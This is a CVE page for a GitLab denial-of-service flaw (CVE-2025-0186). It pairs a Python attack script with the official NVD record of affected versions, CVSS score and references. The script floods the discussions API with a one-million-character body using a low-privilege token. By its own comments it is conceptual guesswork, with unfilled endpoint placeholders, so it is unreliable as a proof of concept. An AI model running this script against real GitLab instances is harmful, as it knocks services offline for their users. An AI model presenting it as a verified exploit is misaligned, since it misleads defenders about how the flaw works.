CVE-2025-0186

import requests # Target GitLab instance URL target_url = "https://your-gitlab-instance.com" # Vulnerable endpoint (example based on description) vulnerable_endpoint = "/api/v4/projects/:id/issues/:issue_iid/discussions" # Authentication token (Low privileged user) token = "glpat-xxxxxxxxxxxx" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Payload designed to exhaust resources (Conceptual) payload = { "body": "A" * 1000000 # Example of a large payload or crafted structure } try: print(f"Sending request to {target_url}{vulnerable_endpoint}...") # Sending the malicious request response = requests.post(target_url + vulnerable_endpoint, json=payload, headers=headers) print(f"Response Status Code: {response.status_code}") print("If the server hangs or responds slowly, the DoS might be successful.") except Exception as e: print(f"An error occurred: {e}")

{"cve": {"id": "CVE-2025-0186", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:32.950", "lastModified": "2026-04-23T20:51:15.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.6 before 18.9.6, 18.10 before 18.10.4, and 18.11 before 18.11.1 that could have allowed an authenticated user to cause denial of service under certain conditions by exhausting server resources by making crafted requests to a discussions endpoint."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "10.6.0", "versionEndExcluding": "18.9.6", "matchCriteriaId": "56DFBE31-2EAF-4E41-A5DF-D4073223C285"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.6.0", "versionEndExcluding": "18.9.6", "matchCriteriaId": "94DA81FB-D270-48E8-AF76-A9000CE943FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.4", "matchCriteriaId": "98D16D9B-6A45-45F3-934B-3ED95C8371BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.4", "matchCriteriaId": "58B8096F-9D7B-403D-B685-E9D4FA24F3E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.11.0:*:*:*:community:*:*:*", "matchCriteriaId": "A6100523-821F-4F41-872D-AC5A60EECC19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "C78F9577-CDD5-497B-A92F-3C578AC6709E"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/22/patch-release-gitlab-18-11-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/511312", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/2915694", "source": "[email protected]", "tags": ["Permissions Required"]}]}}